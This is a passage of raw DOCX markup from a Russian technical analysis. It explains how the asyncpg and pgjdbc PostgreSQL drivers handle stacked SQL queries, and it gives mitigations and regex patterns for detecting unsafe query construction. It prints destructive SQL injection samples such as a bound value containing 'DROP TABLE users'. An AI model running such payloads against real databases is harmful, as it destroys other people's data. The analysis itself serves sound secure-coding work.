        <w:t xml:space="preserve">Значение payload едет как Bind-аргумент:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind:    $1 = 'x''; DROP TABLE users; --'   (текстовое значение, длина 25 байт)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute: возвращает 0 строк</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если же разработчик попытается передать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SQL-текста, передавая args:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">await conn.fetch("SELECT 1; DROP TABLE users", )  # args=()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># или</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">await conn.fetch("SELECT $1; DROP TABLE users", 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В первом случае (args нет) — стакинг проходит (см. путь 1). Во втором (args есть) — сервер отвечает на этапе Parse:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgresSyntaxError: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncpg прокинет это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncpg.exceptions.PostgresSyntaxError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Application code увидит исключение, ни одна команда не исполнилась.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что отличает asyncpg от psycopg3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Нет client-side mogrify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. У psycopg2 параметризация — это безопасный пере-склей строки на клиенте. У psycopg3 без args — text-path с pass-through. У asyncpg без args — буквально голый simple-protocol, и наличие args — единственный признак, по которому драйвер выбирает extended.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Возвращается только последний result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при удачном стакинге. psycopg3 даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">nextset()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и видны оба результата; asyncpg прячет промежуточные.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Нет аналога `psycopg.sql.SQL()`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для безопасной композиции динамических identifiers. Если нужно подставить имя таблицы — единственный безопасный вариант — whitelist + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str.format()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с предварительной валидацией (см. 3.16).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Server-side prepared statement cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> включён по умолчанию: повторные запросы с тем же SQL переиспользуют Parse, что усиливает гарантию extended-path. Кэш ограничен (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_cache_size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, default 100); LISTEN/NOTIFY и DDL обходят его.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigations специфичные для драйвера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Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.execute(sql, *args)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conn.fetch(sql, *args)</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$2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-placeholders. Если args не нужны (SELECT-константа) — всё равно безопасно, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только потому, что в SQL нет пользовательского ввода</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; конкатенация в такой запрос уязвима.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no-args запросов с пользовательским вводом нет — либо переписать на параметризацию, либо использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">await conn.prepare(sql)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> явно, что принудительно переведёт запрос в extended-протокол и заблокирует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динамических identifiers — predefined whitelist (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if table_name not in ALLOWED: raise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), потом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">str.format()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Никаких asyncpg-utils в стандартной поставке.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multi-statement миграций (legitimate use case) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn.execute()</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';'.join(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в transaction-блоке: оставить как явный административный путь, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не вызывать из обработчиков HTTP-запросов</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коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conn\.(fetch|execute|fetchrow|fetchval)\(f"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conn\.(fetch|execute|fetchrow|fetchval)\(".*\+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conn\.(fetch|execute|fetchrow|fetchval)\(".*%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Версии</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncpg ≥ 0.18 (2018) — поведение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 args/без стабильное на всей истории. Актуальная 0.30.x. SQLAlchemy 2.x с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-dialect использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">connection.fetch()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> под капотом — поведение наследуется (см. также 3.5.2 — психология та же, что для psycopg3).</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asyncpg docs: «Basic Usage» — https://magicstack.github.io/asyncpg/current/usage.html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asyncpg API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection.prepare()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://magicstack.github.io/asyncpg/current/api/index.html#asyncpg.connection.Connection.prepare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asyncpg issue #30 (поведение multi-statement) — https://github.com/MagicStack/asyncpg/issues/30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R20 (sources/research.md, строка 334)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.4 pgjdbc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pgjdbc (актуальная ветка 42.7.x) — официальный JDBC-драйвер PostgreSQL. JDBC-API делит исполнение SQL на два класса: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`Statement`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (raw SQL без параметров) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">`PreparedStatement`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SQL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-placeholders + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">setXxx()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-вызовами для значений). Pgjdbc дополнительно управляет wire-протоколом через connection-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">extended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Комбинации: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Statement.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">simple query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, независимо от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Стакинг проходит.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preferQueryMode=extended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">extended protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Parse/Bind/Execute). Стакинг блокирован сервером.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preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pgjdbc эмулирует параметризацию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">client-side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (substitution с экранированием), отправляет через simple-protocol. Стакинг через значение параметра блокирован экранированием, но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SQL-текста (не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проходит.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Кроме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
